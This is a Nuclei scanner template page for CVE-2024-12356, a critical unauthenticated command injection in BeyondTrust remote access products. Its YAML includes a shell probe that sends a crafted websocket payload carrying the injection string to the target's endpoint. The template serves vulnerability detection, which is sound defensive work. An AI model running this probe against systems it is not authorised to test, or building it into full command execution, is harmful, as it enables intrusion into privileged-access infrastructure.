Skip to content
Nuclei Templates

Privileged Remote Access & Remote Support - Command Injection

ID: CVE-2024-12356

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2024,beyondtrust,rce,remote-support,privileged-remote-access

Description

Section titled “Description”

A critical vulnerability has been discovered in Privileged Remote Access (PRA) and Remote Support (RS) products which can allow an unauthenticated attacker to inject commands that are run as a site user.

YAML Source

Section titled “YAML Source”
id: CVE-2024-12356


info:
  name: Privileged Remote Access & Remote Support - Command Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    A critical vulnerability has been discovered in Privileged Remote Access (PRA) and Remote Support (RS) products which can allow an unauthenticated attacker to inject commands that are run as a site user.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-12356
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-12356
    cwe-id: CWE-77
    cpe: cpe:2.3:a:beyondtrust:privileged_remote_access:*:*:*:*:*:*:*:*
  metadata:
    vendor: beyondtrust
    product: privileged_remote_access
    verified: true
  tags: cve,cve2024,beyondtrust,rce,remote-support,privileged-remote-access


code:
  - engine:
      - sh
      - bash
    source: |
      # brew install websocat
      company=`curl -k -s "$Scheme://$Host/get_portal_info" | cut -d '=' -f2 | tail -n 1 | cut -d';' -f1`
      echo -ne "1\n\n0\n\xC0';select 1 -- -\n" | websocat -k wss://$Host/nw --protocol "ingredi support desk customer thin" -H "X-Ns-Company: $company" --binary -n --max-messages-rev 2


    matchers:
      - type: word
        part: response
        words:
          - "0 success"
          - "1 try again later"
# digest: 4b0a004830460221009b992dc11657502934210c647c8a324000984f2ced04da26d5afb3e8cc3a2f9d02210098f750c74fcb8749b28d18e1077b38d9d1a8c6ca6d00b10155f987033cee4171:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "code/cves/2024/CVE-2024-12356.yaml"

View on Github